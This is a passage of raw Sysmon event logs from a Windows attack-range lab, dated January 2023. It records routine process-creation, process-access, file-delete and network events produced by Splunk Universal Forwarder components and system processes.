\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041320Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:29.895{FE4C2B44-D9F3-63C7-0500-00000000AF02}408524C:\Windows\system32\csrss.exe{FE4C2B44-E40D-63C7-1A06-00000000AF02}980C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000041319Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:29.895{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E40D-63C7-1A06-00000000AF02}980C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000041318Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:29.896{FE4C2B44-E40D-63C7-1A06-00000000AF02}980C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.2.5Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=92BD3C71158FA8B9A0821D43564A56E7,SHA256=7850C91F8D08679D7A0579D350C08CA6F6EDEA8A12226ADC2E30B4ABF8CE0BE2,IMPHASH=FD2D4472615B421BAEF1D51F46EF5F52{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000041317Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:29.879{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=3747A6021CF31176E43B15FF8B1C54CA,SHA256=32E3BAE6E3CBC5BC491A7E6A2A746C01CD2AC816F42AEA275E80D959345CBF04,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000041316Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:29.832{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=C89D8D42EBD802C47B15284534EFD5E9,SHA256=92ECC6B33B5F867F422587D1698604303E7EB9C578AB6CC3C6CD90924490E625,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000041315Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:27.009{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56278-false10.0.1.12-8089- 10341000x800000000000000041314Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:29.123{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E40D-63C7-1906-00000000AF02}1404C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041313Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:29.123{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041312Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:29.123{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041311Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:29.123{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041310Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:29.123{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041309Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:29.123{FE4C2B44-D9F3-63C7-0500-00000000AF02}4082524C:\Windows\system32\csrss.exe{FE4C2B44-E40D-63C7-1906-00000000AF02}1404C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000041308Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:29.123{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E40D-63C7-1906-00000000AF02}1404C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000041307Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:29.123{FE4C2B44-E40D-63C7-1906-00000000AF02}1404C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=679D3E04F6AB7B10FF27D06B29C27A12,SHA256=FF1B5220C99EA6173BE693E1C2D700873ADE2F8A73F503FC0D297EA0792756D1,IMPHASH=05D58741E22C6453F52C1A9326FAF02D{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000041306Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:29.013{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B9788262BA96A002E559CBBF8D2A0BFE,SHA256=1D00F5E220121DE7FEB8590E40A8461C5744D2B111C2CC3F011500D7DFD240AB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000041336Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:30.730{FE4C2B44-E40E-63C7-1B06-00000000AF02}62883076C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae795|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6ae2c6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+643d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+65dfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+9dcf50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041335Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:30.574{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E40E-63C7-1B06-00000000AF02}6288C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041334Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:30.574{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041333Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:30.574{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041332Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:30.574{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041331Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:30.574{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000041330Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:30.574{FE4C2B44-D9F3-63C7-0500-00000000AF02}408524C:\Windows\system32\csrss.exe{FE4C2B44-E40E-63C7-1B06-00000000AF02}6288C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000041329Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:30.574{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E40E-63C7-1B06-00000000AF02}6288C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000041328Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:30.574{FE4C2B44-E40E-63C7-1B06-00000000AF02}6288C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.2.5Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=611F936426EC989CDC9FB43B692D3CFA,SHA256=AF94FF9B82C4BF6F27A5695E741D2BDF06A6A574924179D0BC9E7B8A725882F5,IMPHASH=A2763C4BA6D4717F662584401724A6B2{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000041327Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:30.261{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8176B4D94E0A16A6542781AF1F9489AB,SHA256=CF60DB61A4140C0DA940A105F47E49D562F215FFE2329FE21EACB169AA27AFDC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000041326Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:30.089{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D70126DDCF220C265217361429A20A9F,SHA256=A6EAFFA0978DD0B8AD3D59A3FBFA3D12031F467A835E67F02532F44EDE806EF2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000016081Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:30.574{E5A8D418-DCC0-63C7-9F00-00000000B002}3096NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=B33AA8BB07F2205C9DC3D4E36FFF473F,SHA256=527F01D1A42C6D076DB0C205AC104B171414CD82A8DD42E9F12A1CD7FA87483E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000016080Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:30.454{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E40E-63C7-F701-00000000B002}300C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016079Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:30.454{E5A8D418-DC43-63C7-0500-00000000B002}416532C:\Windows\system32\csrss.exe{E5A8D418-E40E-63C7-F701-00000000B002}300C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000016078Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:30.454{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016077Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:30.454{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016076Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:30.454{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E40E-63C7-F701-00000000B002}300C:\Program 